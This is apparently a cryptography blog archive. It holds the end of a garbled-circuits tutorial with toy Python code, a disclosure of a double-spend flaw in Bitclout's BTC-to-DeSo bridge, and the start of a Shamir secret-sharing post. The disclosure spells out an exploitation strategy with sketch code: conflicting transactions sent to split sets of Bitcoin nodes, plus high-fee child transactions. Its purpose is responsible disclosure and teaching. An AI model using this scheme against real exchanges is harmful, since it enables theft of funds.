$E_{K_a^0}(E_{K_b^1}(K_c^{g_{0,1}} || K_c^{g_{0,1}}))$ |
$E_{K_a^1}(E_{K_b^0}(K_c^{g_{1,0}} || K_c^{g_{1,0}}))$ |
$E_{K_a^1}(E_{K_b^1}(K_c^{g_{1,1}} || K_c^{g_{1,1}}))$ |
Each garbled gate will be sent to $\mathcal{P}_B$. The input of $\mathcal{P}_A$, which is ${\bf A} = (A_1,…,A_n)$ will be garbled into $(K_1^{A_1},…,K_n^{A_n})$. The garbled input vector will also be sent to $\mathcal{P}_B$.
After receiving the garbled circuit and the garbled input of $\mathcal{P}_A$, the parties will run $n$ iterations of the OT protocol so $\mathcal{P}_B$ will learn its garbled input $K_{n+1}^{B_1},…,K_{2n}^{B_n}$.
At this point $\mathcal{P}_B$ will evaluate the circuit by sequentially evaluating each gate, starting from the gates that depend only on the inputs of the parties, up until evaluating the gate which yields the output of the function. For each gate with input wires $w_a, w_b$ and output wire $w_c$ we assume that the garbled values of both input wires are already known, either because these are input wires of the circuit or because they come out of a gate which was already evaluated. The value of each wire $w_a$ is one of the encryption keys associated with the wire, either $K_a^0$ or $K_a^1$.
Since the circuit is garbled, $\mathcal{P}_B$ doesn’t know which of those values it holds, so we denote the values it holds, from its perspective, as $K_a^?$ and $K_b^?$. Then, party $\mathcal{P}_B$ will decrypt, using the keys from the input wires, all entries in the table until the decryption yields some string which is repeated twice: $K_c^? || K_c^?$. When it does, $\mathcal{P}_B$ can tell that the decryption succeeded and that the garbled output of the gate is the $K_c^?$ retrieved from the decryption. When the decryption succeeds $\mathcal{P}_B$ sets the value of $w_c$ to $K_c^?$ and moves on to evaluate the next gate. When it finishes evaluating all gates in the circuit it will send the garbled values of the output wires to party $\mathcal{P}_A$.
Party $\mathcal{P}_A$ receives the garbled output of each wire. Using the keys it generated for each wire it can tell whether each value is the garbling of 1 or 0 and thus construct the (ungarbled) output and share it with $\mathcal{P}_B$.
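Putting the three phases together, here is a toy end-to-end run for our example circuit in Python. This is my own sketch under simplifying assumptions: E is a toy SHA-256-based XOR cipher rather than a real symmetric scheme, and the OT step is replaced by simply handing $\mathcal{P}_B$ its two keys.

```python
import hashlib
import secrets

def E(key: bytes, data: bytes) -> bytes:
    """Toy XOR stream cipher (so E(k, E(k, m)) == m); illustration only."""
    stream, c = b"", 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + c.to_bytes(4, "big")).digest()
        c += 1
    return bytes(a ^ b for a, b in zip(data, stream))

def XOR(x, y): return x ^ y
def AND(x, y): return x & y

# Our example circuit: wires 1-4 are inputs (P_A feeds 1,3; P_B feeds 2,4);
# each gate is (function, input wire a, input wire b, output wire c).
GATES = [(XOR, 3, 4, 5), (XOR, 1, 2, 6), (AND, 5, 6, 7)]

# Phase 1: P_A garbles the circuit and its input A = (0, 1), i.e. the number 2.
K = {w: (secrets.token_bytes(16), secrets.token_bytes(16)) for w in range(1, 8)}
garbled = {c: [E(K[a][x], E(K[b][y], K[c][g(x, y)] * 2))
               for x in (0, 1) for y in (0, 1)]
           for g, a, b, c in GATES}
wire = {1: K[1][0], 3: K[3][1]}            # P_A's garbled input

# Phase 2: P_B learns the garbling of its input B = (1, 0), i.e. the number 1;
# in the real protocol this happens via OT, here we just hand the keys over.
wire.update({2: K[2][1], 4: K[4][0]})

# Phase 3: P_B evaluates gate by gate via trial decryption.
for g, a, b, c in GATES:
    for row in garbled[c]:
        plain = E(wire[b], E(wire[a], row))
        if plain[:16] == plain[16:]:        # doubled value marks success
            wire[c] = plain[:16]
            break

# P_A ungarbles the output wire:
result = 0 if wire[7] == K[7][0] else 1
print(result)  # 1, since 2 (binary 10) is the bitwise negation of 1 (binary 01)
```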
In this article we’ve discussed what garbled circuits are, their usage and purpose, and how they can be constructed. The academic community has put a lot of effort into understanding and optimizing garbled circuits, and many optimizations exist which greatly reduce the communication complexity of the parties as well as ensure certain security properties. In particular, some security and integrity properties of the process aren’t guaranteed with our existing construction:
Moreover, we haven’t discussed the construction of OT, which solves one of the core issues in our construction. Maybe I’ll discuss it in a future post.
See you next time!
In this post I will describe a vulnerability I’ve found in the Bitcoin-to-DeSo bridge within the Bitclout backend service, and its exploitation. If you don’t know what Bitclout is, we will get there shortly.
The vulnerability itself is based on a double-spending attack on the Bitcoin network: having some miners hold one set of transactions in their mempool while others hold another, contradictory set.
If you find interest in the internals of Bitcoin, this article reaches great depths of how Bitcoin works and what makes it secure, and gives a glimpse of why solving double-spending in Bitcoin is so important. I will be assuming some familiarity with Bitcoin and how it works throughout the article.
I named this vulnerability “Griphook”, after the character from the Harry Potter world who helped Harry, Ron and Hermione break into Gringotts Bank. If you want to know the connection, continue reading :) !
The article is structured as follows:
First I’ll give some background information about Bitclout and the process of buying Bitclout coins from Bitcoin using Bitclout’s backend’s exchange service.
Next I’ll explain the key issues with the existing mechanism, followed by a pseudo-code styled exploitation outline.
To conclude, I’ll try to give a general sense of what can be done to resolve similar issues in the future and what was done concretely in the case of Bitclout’s service.
Q: I’m a Bitclout user, are / were my coins at risk? Should I sell my coins? Is Bitclout insecure? Is DeSo insecure?
A: The bug only affects Bitclout’s vault and none of the coins / wallets of any user were at risk at any point in time. The security and robustness of the DeSo blockchain was neither at risk.
DeSo (abbreviation of Decentralized Social) is a decentralized blockchain-based social network giving the users a whole new ecosystem by introducing sophisticated usage of creator coins.
The native DeSo coin, denoted as `$DeSo`, is used to purchase such creator coins. We will get rid of the ‘$’ sign and simply use DeSo to denote both the blockchain and the coin itself, where the meaning should be implied from the context.
The original and the most popular gateway into the realms of DeSo is known as Bitclout, and it is a website through which users can use the decentralized social network of DeSo.
The DeSo coin itself can be traded on various crypto exchanges and can be natively exchanged within the Bitclout website from Bitcoin.
To get a better sense of what Bitclout is, the options it gives its users and the philosophy behind its design, follow the Intro to Bitclout Page.
Notice that distinguishing between Bitclout and DeSo is a relatively new concept so some of the documents may still be referring to Bitclout while the correct term should be DeSo. This research was conducted before the introduction of DeSo, but this doesn’t affect the final results of the research.
In the rest of this section we will focus on the proceedings involved in buying DeSo using the BTC-DeSo exchange within the Bitclout website.
Much like various Bitcoin wallets, every user signing up to Bitclout gets a seed of 12 words from which it can derive various keys used to sign transactions in Bitclout.
After signing up, buying DeSo using BTC can be done from within the Bitclout website using this page looking something like this:
Figure 1: Bitclout Deposit Page
In particular, this can be done with the following steps:
After waiting for a few seconds, the swap is confirmed and your Bitclout address will be rewarded with the appropriate amount of DeSo.
This was the moment when I was alarmed and started wondering, “how come my Bitclout account is immediately credited with CLT while the Bitcoin transaction hasn’t been confirmed yet?”.
Bitclout’s backend Github repo is a good source to get a better technical sense on what is happening under the hood when buying DeSo with BTC.
The function handling the exchange of Bitcoin to Bitclout can be found here.
The function (as its name suggests) is stateless, in the sense that it doesn’t hold any state information between consecutive calls. In each call it receives from the client all the necessary pieces of information to generate a Bitcoin transaction from the deposit address, controlled by the client, to Bitclout’s Bitcoin deposit address.
One of the parameters, named $\mathtt{broadcast}$, can be used to determine whether to broadcast the generated transaction to the Bitcoin network or not.
This parameter is necessary because in order to make the exchange, the client will make two calls to the exchange API.
The first will not be broadcast to the network and will only be used to generate a TX which will be sent back to the client and signed by him.
The second call will contain the signature generated by the client for the TX. Using this signature the Bitclout backend is able to broadcast the transaction to the Bitcoin network.
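Abstractly, the two-call pattern looks like the sketch below. All names here (`exchange_api`, the field names, the dummy strings) are hypothetical stand-ins of mine, not the backend’s actual API:

```python
def exchange_api(unsigned_tx=None, signature=None, broadcast=False):
    """Hypothetical stand-in for the stateless exchange endpoint."""
    if not broadcast:
        # Call 1: build the Bitcoin TX and return it for the client to sign.
        return {"unsigned_tx": "unsigned-tx-hex"}
    # Call 2: attach the client's signature and broadcast to the network.
    assert unsigned_tx is not None and signature is not None
    return {"broadcasted": True}

# Client-side flow:
tx = exchange_api(broadcast=False)["unsigned_tx"]   # 1) obtain the unsigned TX
sig = "client-signature-hex"                        # 2) sign locally (stubbed)
ok = exchange_api(unsigned_tx=tx, signature=sig, broadcast=True)["broadcasted"]
```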
In summary, the communication pattern between Bitclout and the client, in the process of exchanging Bitcoin to DeSo constitutes the following messages:
In step 4, as mentioned, the backend is making some verifications regarding the resulting transaction such as:
After doing so it waits for five seconds and then queries the BlockCypher TX-API whether the transaction is a double spend or not.
If this isn’t a double-spend transaction, the Bitclout address is credited with the appropriate amount of DeSo coins by transferring the coins from the Gringotts account using a standard transaction over the DeSo network.
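The double-spend check boils down to reading one boolean out of BlockCypher’s transaction JSON. Here is a minimal parsing sketch (the field layout follows the example response shown later in the post; the HTTP fetch itself is left out so the sketch stays self-contained):

```python
import json

def is_double_spend(tx_response: str) -> bool:
    """Read the double_spend flag from a BlockCypher /txs/<hash> response."""
    return bool(json.loads(tx_response).get("double_spend", False))

# Abridged response in the shape BlockCypher returns:
sample = '{"hash": "38c404eb...", "confirmations": 0, "double_spend": false}'
print(is_double_spend(sample))  # False
```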
In this section I’ll try to describe a simplified version of the attack. This version doesn’t work and never worked but it is important to understand it before diving into the attack that did work eventually.
So, the first and most basic attack one could come up with, according to the aforementioned procedure, is to create a double spending attack as we describe in this subsection.
We denote by $\mathtt{A}$ a UTXO encumbered to some address $\mathtt{Addr}_{\mathtt{A}}$ owned by the attacker, who creates the following two TXs:
Notice that since exchange-TX and self-TX are contradictory, in the sense that they both spend UTXO $\mathtt{A}$, only one of them will eventually be confirmed. The idea is that if the DeSo purchase, done with exchange-TX, is successful but eventually self-TX gets confirmed on Bitcoin, then we managed to buy DeSo without paying the BTC for it, thereby successfully attacking Bitclout’s service.
The self-TX and exchange-TX transactions should be transmitted to the network such that the following assertions hold:
What we try to achieve here is that while Bitclout’s backend credits the attacker’s account with DeSo coins, the Bitcoin TX from the attacker to Bitclout’s account is never confirmed, thanks to the double spend.
However, the three restrictions make this difficult to exploit: to satisfy the first two assertions we want to send self-TX much later than exchange-TX, but to satisfy the third assertion we want to send self-TX earlier than exchange-TX, making the possibility of successfully timing the attack questionable. Thus, this variant of the exploit, while seemingly simple, may require some collusion from the miners to accept into their mempool, and mine, the self-TX despite it reaching them after the exchange-TX.
Bitclout’s backend uses BlockCypher’s API to check whether a transaction is a double spend. The API is used by sending an HTTP GET request to https://api.blockcypher.com/v1/btc/main/txs/ followed by the transaction hash.
For example, by initiating a GET to:
https://api.blockcypher.com/v1/btc/main/txs/38c404ebeb86b72a616636cc38e579ad6478ddbca4fe63c83004cb851a2a391e
we get the following response, containing the `double_spend` field:
```json
{
  "block_height": -1,
  "block_index": -1,
  "hash": "38c404ebeb86b72a616636cc38e579ad6478ddbca4fe63c83004cb851a2a391e",
  "addresses": [
    "1GtZ85mQ36ZbXEPUvS8Nx9Y3HekWW3dZMi"
  ],
  "total": 200661,
  "fees": 200,
  "size": 191,
  "vsize": 191,
  "preference": "low",
  "relayed_by": "3.89.107.32",
  "received": "2021-08-25T12:11:55.248Z",
  "ver": 2,
  "double_spend": false,
  "vin_sz": 1,
  "vout_sz": 1,
  "confirmations": 0,
  "inputs": [
    {
      "prev_hash": "cc22f4f0824ba1e70d6f95e17e6184dab149796c6eaa6e7c332619f8fc99bc3d",
      "output_index": 0,
      "script": "473044022078a8a38f4b307a49892d5f35d86bda65063b6807dd7f8491c28070d50f1ea13a02203f7a74e3001fad59204a620dabe772ea1636465222fd44f8a66d21ed71515759012102f86e9dd205e0e47b8268df43c0084cd7621b4abe5817d26e97d1d4027b002959",
      "output_value": 200861,
      "sequence": 4294967295,
      "addresses": [
        "1GtZ85mQ36ZbXEPUvS8Nx9Y3HekWW3dZMi"
      ],
      "script_type": "pay-to-pubkey-hash",
      "age": 0
    }
  ],
  "outputs": [
    {
      "value": 200661,
      "script": "76a914ae49ea3ce84872d517ef958a7c4b225f4904020788ac",
      "addresses": [
        "1GtZ85mQ36ZbXEPUvS8Nx9Y3HekWW3dZMi"
      ],
      "script_type": "pay-to-pubkey-hash"
    }
  ]
}
```
Given the output of this format, Bitclout takes the `double_spend` key and checks whether it is `true` or `false`.
To make the exploitation of the BTC-DeSo exchange much simpler, we introduce a bug in the way Bitclout makes use of BlockCypher’s API, which manifests only in a specially crafted situation.
The issue stems from Bitclout’s misinterpretation of how BlockCypher determines whether a transaction is a double spend, and more precisely, of whether the property of being a double-spend transaction is transitive. Let’s look at an example.
Assume the following tree of UTXOs/transactions:
Figure 2. A small set of transactions causing the bug
We begin with UTXO $\mathtt{A}$ and double-spend it to create two UTXOs, denoted $\mathtt{B_1}$ and $\mathtt{B_2}$.
To make things clear, by double spend we mean that different nodes in the Bitcoin network hold either $\mathtt{B_1}$ or $\mathtt{B_2}$ in their mempool. As a side note, recall that a bitcoin-core node will by default reject a double spend, so typically either $\mathtt{B_1}$ or $\mathtt{B_2}$ will reside in a node’s mempool, though theoretically a custom node could hold both.
At this point, if we query BlockCypher’s API regarding $\mathtt{B_1}$ or $\mathtt{B_2}$, it will report both transactions as double spends, because both of them spend UTXO $\mathtt{A}$.
However, and here is the tricky part, if we spend UTXO $\mathtt{B_1}$ to create a new UTXO $\mathtt{C}$, then querying BlockCypher will report $\mathtt{C}$ as a non-double-spend transaction.
To make things clear, the definition of a double-spend transaction implied by the responses of BlockCypher’s API is:
Double spend: A transaction will be considered as a double-spend if at least one of its inputs is an input of another transaction that has been in the mempool.
However, the definition Bitclout implicitly assumes for a double spend is:
Double spend: A transaction will be considered as a double-spend if at least one of its inputs is either an output of a double-spend transaction or an input of another transaction that has been in the mempool.
In other words, Bitclout implicitly assumes that the definition of double-spend is transitive, while on BlockCypher this isn’t the case.
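The difference between the two definitions can be demonstrated with a toy mempool model. The data structures and function names below are illustrative, not BlockCypher's or Bitclout's actual code.

```python
# Toy transaction graph: B1 and B2 both spend A's output, C spends B1's output.
txs = {
    "B1": {"inputs": ["A:0"], "outputs": ["B1:0"]},
    "B2": {"inputs": ["A:0"], "outputs": ["B2:0"]},
    "C":  {"inputs": ["B1:0"], "outputs": ["C:0"]},
}

def blockcypher_double_spend(name):
    """BlockCypher's definition: shares an input with another known transaction."""
    my_inputs = set(txs[name]["inputs"])
    return any(my_inputs & set(t["inputs"]) for n, t in txs.items() if n != name)

def transitive_double_spend(name):
    """Bitclout's implicitly assumed definition: also inherits the flag from parents."""
    if blockcypher_double_spend(name):
        return True
    parents = [n for n, t in txs.items()
               if set(t["outputs"]) & set(txs[name]["inputs"])]
    return any(transitive_double_spend(p) for p in parents)

assert blockcypher_double_spend("B1") and blockcypher_double_spend("B2")
assert not blockcypher_double_spend("C")   # what the API actually reports for C
assert transitive_double_spend("C")        # what Bitclout implicitly assumed
```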
In this section we’ll give an exploit for the bug from the previous section. This exploit isn’t optimal and doesn’t really work, but it is important to understand it in order to understand the fully optimized exploit that follows. Consider the following diagram from the previous subsection illustrating a tree of UTXOs:
Figure 3. A small set of transactions causing the bug
Note: For simplicity, we will refer to $\mathtt{A}$, $\mathtt{B_1}$, $\mathtt{B_2}$ and $\mathtt{C}$ sometimes as UTXOs and sometimes as the transactions whose output is the corresponding UTXO.
In our exploitation we begin with a UTXO $\mathtt{A}$ owned by the attacker.
The attacker will send two transactions creating two UTXOs, both spending UTXO $\mathtt{A}$.
Now the attacker initiates a BTC-DeSo exchange against Bitclout. As we mentioned earlier, when initiating an exchange in the BTC-DeSo bridge, the client reports which UTXOs it wishes to spend. Thus, the attacker reports only UTXO $\mathtt{B_1}$ as available, so the Bitclout backend will try to spend UTXO $\mathtt{B_1}$ by creating a new transaction $\mathtt{C}$, with minimal fees (as fees are controlled by the attacker), to Bitclout’s Bitcoin address.
When the appropriate verifications are made, the transaction will obviously not be considered an RBF, passing Blockonomics’ verification.
When Bitclout’s backend sends the created transaction $\mathtt{C}$ to BlockCypher, it will obviously not be considered a double spend, since it is the only transaction spending UTXO $\mathtt{B_1}$.
At this point the attacker’s Bitclout address will be credited with an appropriate amount of DeSo.
However, since transaction $\mathtt{B_2}$ carries much higher fees, a miner will be much more likely to prefer it over $\mathtt{B_1}$ and $\mathtt{C}$, thus cancelling the payment to Bitclout’s address and completing the attack successfully.
Now, this attack sounds quite simple, and it is; this is exactly why it doesn’t really work in practice.
At this point I had come up with multiple hypotheses, all stemming from the following basic rule:
You see, the Bitcoin network is composed of nodes, interconnected in mysterious and unknown ways to each other. In our attack we have created two UTXOs:
We sent $\mathtt{B_1}$ via a node owned by BlockCypher, so we can assume this node is connected to multiple other large nodes and big shots in the crypto industry. Therefore, the message sent from BlockCypher’s node will probably propagate quickly to Blockonomics’ node, which is good, because we need Blockonomics’ node to know this TX to pass the RBF test; but it will also quickly propagate to other nodes, some owned by the great mining pools, for example.
In contrast, we sent $\mathtt{B_2}$ via our local Bitcoin node, which is connected to a small set of random nodes on the Bitcoin network, and the TX may thus endure longer propagation delays before reaching nodes such as Blockonomics’ node and miners’ nodes.
In the following section we’ll get a better sense of what propagation delays are and how to use them as part of the exploit.
Consider the following figure:
Figure 4. A set of nodes and their messages’ propagation delays
This figure gives a general illustration of the Bitcoin network, with several nodes in it.
The large circle resembles the Bitcoin network. Inside, we have two main “nodes”, denoted with pink rectangles.
Surrounding each of these nodes is a circle, delineating the portion of the network reachable from each node within a 2 milliseconds delay. In other words, each circle marks the portion of the network that will receive a Bitcoin message sent from each node with at most 2 milliseconds delay. Since each node is connected to a different set of nodes, the circles cover different parts of the network, both in placement and in size.
Therefore, consider our original scenario, where we send two different transactions, both spending the same UTXO: one from our local Bitcoin node and the other from BlockCypher’s Bitcoin node. We would like to know, for four different nodes in the network, positioned at the points labelled A, B, C and D, which Bitcoin transaction they accepted into their mempool 2 milliseconds after the moment these two transactions were broadcast to the network.
It is important to mention that node C will accept only one of the transactions into its mempool to prevent DoS attacks on Bitcoin nodes. This is the default behavior in the Bitcoin-core project, and some nodes may behave differently. Due to this fact, we want to transmit the two transactions to the network in a way that will promise the following three properties:
Ideally, we would prefer to send TX $\mathtt{B_1}$ directly from Blockonomics’ node, or to connect directly to their node, so that this TX reaches Blockonomics’ node WHP (with high probability) before TX $\mathtt{B_2}$ while reaching as few other nodes on the Bitcoin network as possible along the way; this way TX $\mathtt{B_2}$ will reach more nodes and will be confirmed WHP.
In other words, we want to create a setting in the mempools of the nodes in the Bitcoin network where a large portion of the nodes disagree with Blockonomics’ node. To be precise, a node disagrees with another node if each holds a different TX spending the same UTXO. For example, in the previous case where we concurrently sent TXs $\mathtt{B_1}$ and $\mathtt{B_2}$, all nodes who accepted $\mathtt{B_1}$ into their mempool disagree with all nodes who accepted $\mathtt{B_2}$ into their mempool.
The problem is that we don’t know the structure of the network, and we don’t even know which node is Blockonomics’ node. If we did, we could simply send Blockonomics’ node TX $\mathtt{B_1}$ and relentlessly broadcast TX $\mathtt{B_2}$ to every other node on the network, so that TX $\mathtt{B_1}$ would reach only a small number of nodes.
To overcome this issue we can use a different approach. Instead of bisecting the set of nodes in the network into two sets who disagree with each other in one shot, we will iteratively get more and more nodes to disagree with Blockonomics. This will be done without knowing which node is owned by Blockonomics. We will be assuming:
Consider a set of nodes $\mathcal{N}$, for simplicity we assume $\left|\mathcal{N}\right| = 2^k$. We can split $\mathcal{N}$ into two sets $\mathcal{H_1}$ and $\mathcal{H_2}$, each of size $2^{k-1}$.
Assume we have a UTXO $\mathtt{A}$. We want to create two transactions $\mathtt{B_1}$ and $\mathtt{B_2}$ such that $\mathtt{B_1}$ will enter the mempool of all nodes in $\mathcal{H_1}$ and $\mathtt{B_2}$ will enter the mempool of all nodes in $\mathcal{H_2}$. We can do this by broadcasting $\mathtt{B_1}$ to all nodes in $\mathcal{H_1}$ and $\mathtt{B_2}$ to all nodes in $\mathcal{H_2}$.
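The split-and-broadcast step can be sketched as follows; `broadcast` is a hypothetical callback standing in for an actual peer-to-peer connection to each sampled node.

```python
import random

def split_and_broadcast(nodes, tx1, tx2, broadcast):
    """Split the sampled node set N into two equal halves H1, H2
    and send each half one of the two conflicting transactions."""
    shuffled = random.sample(nodes, len(nodes))
    half = len(shuffled) // 2
    h1, h2 = shuffled[:half], shuffled[half:]
    for node in h1:
        broadcast(node, tx1)  # H1's mempools should end up holding tx1
    for node in h2:
        broadcast(node, tx2)  # H2's mempools should end up holding tx2
    return h1, h2
```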
To estimate the effectiveness of this process we make a major assumption on the structure of the Bitcoin network and the sampled set of nodes. We call it “the structural assumption”:
We assume that by sending two conflicting TXs ($\mathtt{B_1}$ and $\mathtt{B_2}$) to two equally sized sets of nodes on the Bitcoin network ($\mathcal{H_1}$ and $\mathcal{H_2}$), randomly sampled using the Bitnodes API, approximately $50\%$ of all nodes will eventually hold $\mathtt{B_1}$ and $50\%$ will hold $\mathtt{B_2}$ in their mempool.
After broadcasting $\mathtt{B_1}$ to the nodes in $\mathcal{H_1}$ and $\mathtt{B_2}$ to the nodes in $\mathcal{H_2}$ we certainly know that one of them got into Blockonomics and one didn’t. Therefore, we can query Blockonomics’ API about whether it holds $\mathtt{B_1}$ or $\mathtt{B_2}$ in its mempool.
Let’s assume WLOG (without loss of generality) that $\mathtt{B_1}$ was accepted into Blockonomics’ node’s mempool. Therefore, all nodes in $\mathcal{H_2}$ disagree with Blockonomics, and by our “structural assumption” we know that roughly $50\%$ of the network disagrees with Blockonomics.
The first thing we will do at this point is to incentivize all nodes that accepted $\mathtt{B_2}$ into their mempool to mine $\mathtt{B_2}$. This can be done by sending a new TX $\mathtt{B_3}$ with very high fees that spends the output of $\mathtt{B_2}$. Since the miners want the fees from TX $\mathtt{B_3}$, they will also have to mine $\mathtt{B_2}$, on which $\mathtt{B_3}$ relies.
After doing this we are in a familiar state, and we would like to apply the algorithm recursively; let’s see how this can be done. We have a TX that we want to double spend (originally: $\mathtt{A}$, now: $\mathtt{B_1}$) and a set of nodes who hold this TX in their mempool (originally: $\mathcal{N}$, now: $\mathcal{H_1}$). Now we can run the algorithm by splitting $\mathcal{H_1}$ into two equally sized sets of nodes and sending each half a different TX (either $\mathtt{C_1}$ or $\mathtt{C_2}$) spending the output of $\mathtt{B_1}$, getting a TX tree like this:
Figure 5. First recursive amplification step
Now we check whether $\mathtt{C_1}$ or $\mathtt{C_2}$ was accepted into Blockonomics. Let’s assume WLOG it is $\mathtt{C_1}$. So we create a TX $\mathtt{C_3}$ with very high fees to incentivize the network to prefer mining $\mathtt{C_2}$ rather than $\mathtt{C_1}$, getting a tree like this:
Figure 6. Second recursive amplification step
Now, to make sure you’ve been following the recursion, try drawing the TX tree after the next recursion step yourself before scrolling further to check that you’ve got it right.
The tree would look like:
Figure 7. Third recursive amplification step
Notice that after each recursive step the number of nodes in the Bitcoin network who agree with Blockonomics is cut by half. Since we started with $|\mathcal{N}| = 2^k$ nodes, after $k$ recursive steps only a single node in our set will agree with Blockonomics’ mempool on average.
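The recursive amplification can be sketched as a simple loop. All three helpers are hypothetical stand-ins for network operations: `send_conflicting_pair(utxo, h1, h2)` broadcasts two conflicting TXs spending `utxo` (one per half) and returns them, `blockonomics_holds(tx)` asks Blockonomics' API which TX its node accepted, and `send_high_fee_child(tx)` spends `tx` with very high fees.

```python
def amplify(nodes, utxo, send_conflicting_pair, blockonomics_holds, send_high_fee_child):
    """Each iteration halves the set of nodes still agreeing with Blockonomics."""
    while len(nodes) > 1:
        half = len(nodes) // 2
        h1, h2 = nodes[:half], nodes[half:]
        tx1, tx2 = send_conflicting_pair(utxo, h1, h2)
        if blockonomics_holds(tx1):
            agreeing, losing_tx, next_utxo = h1, tx2, tx1
        else:
            agreeing, losing_tx, next_utxo = h2, tx1, tx2
        # Incentivize miners on the disagreeing half to confirm the losing branch.
        send_high_fee_child(losing_tx)
        nodes, utxo = agreeing, next_utxo
    return nodes  # roughly a single node left agreeing with Blockonomics
```

Starting from $2^k$ sampled nodes, the loop runs $k$ times, matching the halving argument above.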
For example, in the last diagram, for the attack to fail we need the $1/8$ of the nodes who still agree with Blockonomics to mine $\mathtt{D_1}$ (for minimal fees) before the $7/8$ who disagree with Blockonomics mine either $\mathtt{D_3}$, $\mathtt{C_3}$ or $\mathtt{B_3}$ (for very high fees). Given the greedy nature of the miners, this scenario is very unlikely after going all the way down the recursion, thus giving our attack a very high probability of success.
Using this algorithm I have managed to successfully attack and steal (with permission from DeSo’s team, of course) a small amount of coins from Gringotts Bank!
The solution suggested to the DeSo team is to verify, on Bitclout’s backend, when making a purchase using Bitcoin, that all inputs of the purchase are either confirmed or are not double-spending outputs. This is done using BlockCypher’s API. For those inputs that aren’t confirmed, or are confirmed with fewer than 6 confirmations, check their inputs recursively for the same properties, until all paths from all inputs end in confirmed TXs with a sufficient number of confirmations.
For example, consider the following graph of TXs:
Figure 8. A set of transactions to be verified. Green transactions are non-double-spent with 6+ confirmations
Each node in the graph is a TX and an arrow from TX $\mathtt{X}$ to TX $\mathtt{Y}$ means that one of the inputs of TX $\mathtt{Y}$ is an output from TX $\mathtt{X}$.
Green nodes are confirmed TXs with 6+ confirmations.
Notice that a TX may have many outputs and that the graph isn’t necessarily a tree. For example, TXs $\mathtt{D2}$ and $\mathtt{D1}$ have multiple outputs that were used as inputs in TXs $\mathtt{C1}$ and $\mathtt{C2}$.
Now, let’s assume that a user holding the outputs of TX $\mathtt{A}$ is trying to make a purchase using the TX’s output. Bitclout’s backend shall take $\mathtt{A}$ and check whether it is confirmed with at least 6 confirmations. If so, the verification ends successfully. Otherwise, the backend shall, recursively, take $\mathtt{A}$‘s inputs, namely $\mathtt{B1}$ and $\mathtt{B2}$, and check whether those are confirmed or not.
Since $\mathtt{B1}$ is confirmed with 6+ confirmations, we shall not continue checking its inputs.
However, this isn’t the case for $\mathtt{B2}$. So we first check that it isn’t a double spend, and then take its inputs $\mathtt{C1}, \mathtt{C2}$ and check whether they are confirmed with 6+ confirmations. Since they aren’t either, we check that they aren’t double spent, and if not, we move to their inputs, $\mathtt{D1}, \mathtt{D2}$, and check whether those are double-spending transactions.
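The recursive verification above can be sketched as follows; `get_tx` is a hypothetical lookup standing in for BlockCypher API calls, and the TX records are toy data, not real API responses.

```python
CONFIRMED = 6  # required number of confirmations

def verify(tx_hash, get_tx):
    """Accept only if every ancestry path ends in a 6+-confirmation TX
    with no unconfirmed double-spending ancestor along the way."""
    tx = get_tx(tx_hash)
    if tx["confirmations"] >= CONFIRMED:
        return True          # this path ends in a sufficiently confirmed TX
    if tx["double_spend"]:
        return False         # an unconfirmed ancestor is a double spend
    # Otherwise, recurse into all inputs of this unconfirmed TX.
    return all(verify(parent, get_tx) for parent in tx["inputs"])
```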
Reminder: We say that a transaction is a double spend if one of its inputs was used as an input to another transaction in some other nodes’ mempools.
This suggestion was implemented (with some other edge cases) in a recently pushed commit into Bitclout’s core library.
By finding a minor vulnerability in Bitclout’s backend, an attacker could have stolen very large amounts of money from the DeSo vaults using the BTC-DeSo bridge, with the Bitclout coin price reaching 150$ as of Oct. 1st, 2021. DeSo’s BTC wallet address (3MxwZUJGpLYRhtMKXgCUi3x68uosEGhyGw) has received hundreds of Bitcoins in the past three months alone, and their previous address, which was active until July (1PuXkbwqqwzEYo9SPGyAihAge3e9Lc71b), received thousands of Bitcoins. Thus, the potential financial damage of such an attack could have had devastating implications for the future of the Bitclout project.
I want to thank DeSo’s team for making the reporting and the bounty award process smooth and simple and for taking the time and effort to deeply understand my commentary and suggestions.
Multi-Party Computation (MPC) heavily relies on the primitive of Shamir’s secret sharing (SSS) for various use cases. In this secret-sharing scheme, a set of $n$ parties would like to hold a secret in a distributed manner. The secret, which will be denoted $s$ for the rest of this post, is an element of a field $\mathbb{Z}_p$. It is important to mention that “distributed manner” means that each party $P_i$ will hold a piece of information $p_i$ such that these pieces of information can later be used to reconstruct the original secret $s$. Typically, secret-sharing schemes are associated with a threshold through which the security of the scheme is defined. A secret-sharing scheme with security threshold $t$ should satisfy the following security guarantees:
The parameters $t$ and $n$ are known prior to the sharing of the secret. With all that being said, it is still unclear how such a scheme is bootstrapped. How are the shares $p_i$ created and sent to each party $P_i$? To simplify things, we assume for now that there is a trusted dealer who sends each party $i$ its corresponding $p_i$. Later we will see how we can get rid of this trusted dealer. So what is this $p_i$, and what does it look like?
DISCLAIMER: I may not be 100% algebraically accurate, for the sake of both brevity and clarity.
REMINDER: A polynomial $P(x)$ is a function which can be expressed algebraically in the following form: $P(x) = \sum_{i=0}^k a_ix^i$ for some number $k$. The $a_i$ are called “coefficients” and the largest $i$ such that $a_i \neq 0$ is the “degree” of the polynomial. Note that in the case where all coefficients are zero, we consider the degree to be $-\infty$.
Shamir’s secret sharing utilizes one key algebraic property of polynomials, known as the “unique interpolation theorem”, which states that:
Given a set $S=\{(x_0,y_0),…,(x_t,y_t)\}$ of $t+1$ pairs of field elements, such that all the $x_i$ are distinct, there exists a unique polynomial $P_S(x)$ of degree at most $t$ such that $P_S(x_i)=y_i$ for all $0\leq i\leq t$.
Therefore, given two distinct polynomials $P_1(x), P_2(x)$ of degree at most $t$ and a set of $t+1$ sample points $x_0,…,x_t$ then for at least one $i$ between $0$ and $t$ it must hold that $P_1(x_i) \neq P_2(x_i)$. Thus, a set of $t+1$ evaluations of a polynomial is all that is required to reconstruct a polynomial $P(x)$. By “reconstructing” we mean deriving the coefficients $a_i$ of the polynomial so we will be able to express the polynomial in the form $P(x)=\sum_{i=0}^ta_ix^i$. This process of reconstructing a polynomial from a set of its evaluations is also known as interpolation.
Before diving into how the sharing is done, let’s answer an even more fundamental question. Given these $t+1$ evaluations of a polynomial at points $x_0,…,x_{t}$, how can the interpolation polynomial be constructed? The reconstruction’s smallest building blocks will be a set of $t+1$ polynomials $\pi_i^t(x)$, each of degree at most $t$, that satisfy for $x \in \{ x_0,…,x_{t} \}$ the following $t+1$ constraints:
